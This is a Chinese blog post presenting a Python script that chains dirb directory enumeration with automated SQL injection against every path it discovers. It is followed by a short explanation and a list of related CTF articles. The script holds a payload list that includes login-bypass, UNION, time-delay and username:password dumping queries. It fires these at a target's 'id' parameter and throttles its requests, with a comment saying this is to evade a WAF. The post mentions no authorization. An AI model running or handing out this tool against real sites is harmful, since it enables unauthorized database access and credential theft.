sql注入DIRB版本

最新推荐文章于 2024-11-08 14:07:13 发布
最新推荐文章于 2024-11-08 14:07:13 发布
阅读量384 收藏 3
点赞数 5
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45631123/article/details/140743195
版权

用于对目标域名进行目录枚举和 SQL 注入测试。。

import requests
import subprocess
import logging
import time

# 设置日志配置
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

# SQL 注入有效载荷列表
SQL_INJECTION_PAYLOADS = [
    "' OR '1'='1' --",  
    "' OR 'a'='a' --",  
    "' OR 1=1 --",  
    "' AND 1=(SELECT COUNT(*) FROM users) --",  
    "'; SELECT concat(username, ':', password) FROM users --",  
    "'; WAITFOR DELAY '0:0:5'; --",  
    "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1/0) END) --",  
    "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --",  
    "' AND EXISTS(SELECT * FROM users WHERE username='admin') --",  
    "'; SELECT @@datadir; --",  
]

def run_dirb(target_url):
    """
    运行 dirb 工具来枚举目录.
    :param target_url: 目标URL
    :return: 一个包含发现的目录的列表
    """
    try:
        cmd = ['dirb', target_url]
        result = subprocess.run(cmd, capture_output=True, text=True, check=True)
        
        # 解析 dirb 输出中的目录
        found_dirs = []
        for line in result.stdout.splitlines():
            if line and '/' in line:
                found_dirs.append(line.split(' ')[-1])  # 获取目录部分
        return found_dirs
    except subprocess.CalledProcessError as e:
        logger.error(f"运行 dirb 失败: {e}")
        return []

def test_sql_injection(url, payload):
    """
    测试特定 URL 对 SQL 注入的漏洞.
    :param url: 目标 URL
    :param payload: SQL 注入有效载荷
    :return: 响应内容和状态代码
    """
    try:
        response = requests.get(f"{url}?id={payload}", timeout=5)
        if "error" in response.text.lower() or "mysql" in response.text.lower():
            logger.warning(f"潜在的 SQL 注入点发现 with payload: {payload}")
        elif "admin" in response.text.lower():  # 检测管理用户
            logger.info(f"管理用户可能暴露 with payload: {payload}")
        return response.content, response.status_code
    except requests.exceptions.RequestException as e:
        logger.error(f"请求失败: {e}")
        return None, None

def main(target_url):
    """
    主函数,进行 SQL 注入测试.
    """
    logger.info(f"开始对 {target_url} 进行目录枚举")
    
    # 执行 dirb 工具并获取发现的目录
    discovered_dirs = run_dirb(target_url)
    
    if not discovered_dirs:
        logger.info("未发现任何目录.")
        return
    
    logger.info(f"发现的目录: {discovered_dirs}")

    # 对每个发现的目录进行 SQL 注入测试
    for dir in discovered_dirs:
        for payload in SQL_INJECTION_PAYLOADS:
            target = f"{target_url}{dir}"
            logger.info(f"正在测试 {target} with payload: {payload}")
            response, status_code = test_sql_injection(target, payload)
            if response:
                logger.info(f"响应状态: {status_code}, 响应内容前100字: {response[:100]}")
            time.sleep(1)  # 限制请求速率以避免触发 WAF

if __name__ == "__main__":
    target_url = "http://example.com"  # 替换为目标网站
    main(target_url)

代码解释:

  1. 日z记录:使用 logging 模块记录信息、警告和错误。

  2. SQL 注入有效载荷:定义了一些常见的 SQL 注入有效载荷用于测试。

  3. run_dirb 函数:执行 dirb 工具并解析输出,返回发现的目录列表。

  4. test_sql_injection 函数:尝试对每个目录执行 SQL 注入测试,通过检查响应内容来判断是否存在漏洞。

  5. main 函数:汇总目录枚举和 SQL 注入测试的逻辑,输出发现的目录及其测试结果。

来自于狂人
关注
SQL注入的注入
weixin_51519028的博客
07-18 8559
1,注入首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。 2,交互一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.php?id=1这种很大程度存在注入当然有些注入不会这么一眼看出会有些比较复杂例如http://www.xxx.com:50006/index.php?x=home&c=View&a=index&aid=9 这样的地址其实也可能存在注入。......
SQL注入与万能密码登录
山兔的博客
10-26 4301
今天的靶机是一个主要面向web应用程序的框架。更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入。我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜索项目攻击类型。任何用户都不应该看到此数据库中的所有项目,因此网站将为我们提供不同的搜索结果。SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户要登录时,Web 应用程序都会将登录页输入(用户名/密码组合)发送到 SQL 服务,并将其与该特定用户的存储数据库条目进行比较。
CTF-11.SQL注入(post)
woo233的博客
09-20 989
SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入。比如url中,以及http报文中,POST传递的参数;只要是用户可以输入的位置都是有可能存在注入的;漏洞扫描器的扫描结果也不一定正确。
ctf—SQL注入(post)
YkingH的博客
07-07 1148
ctf—SQL注入(post) SQL注入漏洞介绍 ​ sql注入攻击指用用户构建特殊的输入作为参数传入web应用程序,通过执行sql语句,而执行攻击者所要的操作,主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 ​ 任何一个用户可以输入的位置都可以是注入。比如url中,以及http报文中,post传递的参数 1.信息探测 扫描主机开放的全部端口 nmap -T4 -p -靶场IP 快速扫描主机全部信息 nmap -T4 -A -v 靶场IP 探测敏感信息 nikto -host ht
CTF训练 web安全SQL注入(post)
梁辰兴的博客
10-24 1133
SQL注入攻击指的是用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据入侵系统。任何一个用户可以输入的位置都可能是注入。比如url中,以及http报文中,POST传递的参数。只要是用户可以输入的位置都是有可能存在注入的;漏洞扫描器的扫描结果也不一定正确。
sql注入基础(web安全入门08)
黑战士的博客
01-23 1915
一、SQL 简介 SQL 结构化查询语言,是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986 年 10 月,美国国家标准学会对 SQL 进行规范后,以此作为关系式数据库管理系统的标准语 言。 MYSQL ACCESS MSSQL orcale 明显的层次结构 库名|表名|字段名|字段内容(像 excel 文件一样) 不过各种通行的数据库系统在其实践过程中都对 SQL 规范做了某些编改和扩充。所以实际 上不同的数据库系统之间的 SQL 不能完全通用。 SQL 注入(SQL Injection)是一
Web渗透-SQL注入
YangYubo091699的博客
08-05 1901
SQL注入
sql注入-post篇
weixin_45007073的博客
01-02 1294
打CTF比赛的时候,sql注入算是比较常见的题型,今天来记录一下基于靶机的post注入。 准备工作 靶机下载: 链接:https://pan.baidu.com/s/1o8-25n0LtDTk2w_SgOT2og 提取码:zlqz 攻击过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用nmap进行主机服务检测 发现目标主机开放了80、8080等端口 使用nikto进行信息收集 nikto -host http://192.168.101.34
hackerme2靶机渗透~SQL注入+命令执行
weixin_67832625的博客
08-12 568
本文主要是SQL注入和命令执行的漏洞进行挖掘,并且对最后的提权一个靶机练习,笔者用最详细的介绍和讲解,有任何问题随时反馈给作者
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 4093
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
渗透ctf靶场机器练习7(sql注入)
qq_37027540的博客
09-20 1632
渗透ctf靶场机器(7) 靶场下载链接: 百度云:https://pan.baidu.com/s/1dbTy_2pv_bbC4yYMosgS0g 信息收集 使用kali对靶机的ip进行探测,先查看kali的ip然后使用nmap探测kali所处的整个网段 存在一个http服务,打开页面查看内容,并可以使用nikto或者dirb对网站目录进行探测 随便击可以击的超链接发一个页面非常...
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
qq_45722813的博客
12-10 4330
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
CTF之Hackademic RTB2 靶机渗透(万能密码 端口敲门 joomla1.5 SQL注入)
afei001
08-22 901
练习环境     攻击机:kali     靶机:Hackademic: RTB2     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
CTF之DC-8 靶机练习(SQL注入)
afei001
08-05 566
  练习环境     攻击机:kali     靶机:DC-8     下载地址:https://download.vulnhub.com/dc/DC-8.zip      1.发现靶机并进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.130 netmask 255.255.255.0 broadcast.
如何产看SQL 查询的执行时间
技术广场
11-05 397
对于查看毫秒级执行时间,推荐使用 SET STATISTICS TIME或 GETDATE()计时方法。这两种方法可以直接在 SQL Server Management Studio 中快速应用。
SQL 常用更新操作
Fisher3652的博客
11-05 230
SQL 常用更新操作
如何在Linux中使用Cron定时执行SQL任务
最新发布
Mr_Wanter
11-08 365
linux crontab 定时执行sql脚本。
Flink SQL
qq_41081716的博客
11-05 345
以上步骤展示了如何使用 Flink SQL 从 Kafka 读取数据、进行聚合计算,并将结果分别写入 MySQL 和 HDFS。这是一个基本的流程,根据实际需求,可以调整表结构、连接器配置以及 SQL 查询以适应不同的应用场景。
PostgreSQL (八) 创建分区
fracong的博客
11-04 338
分区的新建和查询
linux安装dirb
09-16
请注意替换“x.x”为您下载的dirb安装包的版本号。 3. 进入dirb目录:在终端中使用以下命令进入解压后的dirb目录: ``` cd dirb-x.x ``` 4. 安装依赖项:在终端中执行以下命令安装编译dirb所需的依赖项: ``` sudo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值